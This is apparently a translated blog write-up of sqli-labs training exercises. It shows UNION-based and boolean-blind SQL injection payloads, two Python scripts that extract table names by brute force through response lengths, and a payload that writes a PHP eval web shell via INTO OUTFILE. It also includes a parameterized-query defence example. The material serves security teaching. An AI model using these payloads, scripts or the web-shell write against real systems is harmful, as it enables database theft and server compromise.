  • SQL injection

    About SQL injection

    • Prerequisites for SQL injection

      • User input is not filtered, and the SQL statement is not precompiled (no prepared statement)
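As an added example (not code from the original post), the prerequisite above shown side by side: a query built by string concatenation next to the same query with a bound placeholder, run against a constructed in-memory SQLite database standing in for the lab's `users` table. The boolean probe is the Less-5 style payload adapted to SQLite (`substr` for `mid`, `sqlite_master` for `information_schema`, `-- ` for `#`); table names and rows are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn

def lookup_concat(conn, user_id):
    """Vulnerable: the request parameter is pasted into the SQL text with no
    escaping and no prepared statement, so quotes, AND and comments inside it
    are parsed as SQL. Returns whether a row came back (the lab's true/false page)."""
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % user_id
    return conn.execute(sql).fetchone() is not None

def lookup_param(conn, user_id):
    """Hardened: a placeholder binds the value as data; the statement's
    structure is fixed before the value is ever seen."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone() is not None

# Boolean probe in the style of the page's payloads, translated to SQLite:
# true only when the first table name starts with 'u' (it does: `users`).
PROBE_TRUE = "1' AND substr((SELECT name FROM sqlite_master WHERE type='table'),1,1)='u'-- "
PROBE_FALSE = "1' AND substr((SELECT name FROM sqlite_master WHERE type='table'),1,1)='x'-- "

def demo():
    """Run both lookups against the same probes and return the outcomes."""
    conn = make_db()
    try:
        return {
            # Concatenation: the result flips with the guessed character,
            # which is exactly the one-bit oracle a blind script reads.
            "concat_true": lookup_concat(conn, PROBE_TRUE),    # True
            "concat_false": lookup_concat(conn, PROBE_FALSE),  # False
            # Binding: the whole probe is compared against id as one value,
            # so neither probe matches and nothing leaks; a real id still works.
            "param_true": lookup_param(conn, PROBE_TRUE),      # False
            "param_false": lookup_param(conn, PROBE_FALSE),    # False
            "param_legit": lookup_param(conn, "1"),            # True
        }
    finally:
        conn.close()

if __name__ == "__main__":
    print(demo())
```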

    select group_concat(table_name) from information_schema.tables where table_schema=database()
    ?id=-1") union  select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23

    ?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

    ?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23
    import requests
    import time

    # Boolean-based blind probe against the sqli-labs Less-5 target: the page body
    # has a fixed length (704 bytes here) when the injected condition is true and
    # a different length when it is false, so the length is the true/false oracle.
    for i in range(0, 100):
        if i % 10 == 0:
            time.sleep(1)  # pause after every ten positions
        # First ask whether the character at position i of the comma-separated table list is ','
        url = "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
        res = requests.get(url)
        if len(res.content) == 704:
            print(",", end="")
            continue
        # Otherwise try each lowercase letter until the "true" response length comes back
        for e in range(ord("a"), ord("z") + 1):
            url = "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )='" + chr(e) + "'%23"
            res = requests.get(url)
            if len(res.content) == 704:
                print(chr(e), end="")
                break
    ?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
    Python script: same as above


    @@datadir reads the database data directory path
    @@basedir gets the MySQL installation path
    http://localhost/sqli-labs-master/Less-7/?id=-1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'C:/AppServ/www/data.txt' %23
    import requests
    import time

    # Same boolean-based blind probe as the Less-5 script, against the Less-8 target;
    # 706 is the response length of the "true" page for this target.
    for i in range(0, 100):
        # First ask whether the character at position i of the comma-separated table list is ','
        url = "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
        res = requests.get(url)
        time.sleep(1)  # pause after every request
        if len(res.content) == 706:
            print(",", end="")
            continue
        # Otherwise try each lowercase letter until the "true" response length comes back
        for e in range(ord("a"), ord("z") + 1):
            url = "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )='" + chr(e) + "'%23"
            res = requests.get(url)
            time.sleep(1)
            if len(res.content) == 706:
                print(chr(e), end="")
                break
  • Original source: https://www.cnblogs.com/hackering/p/14232300.html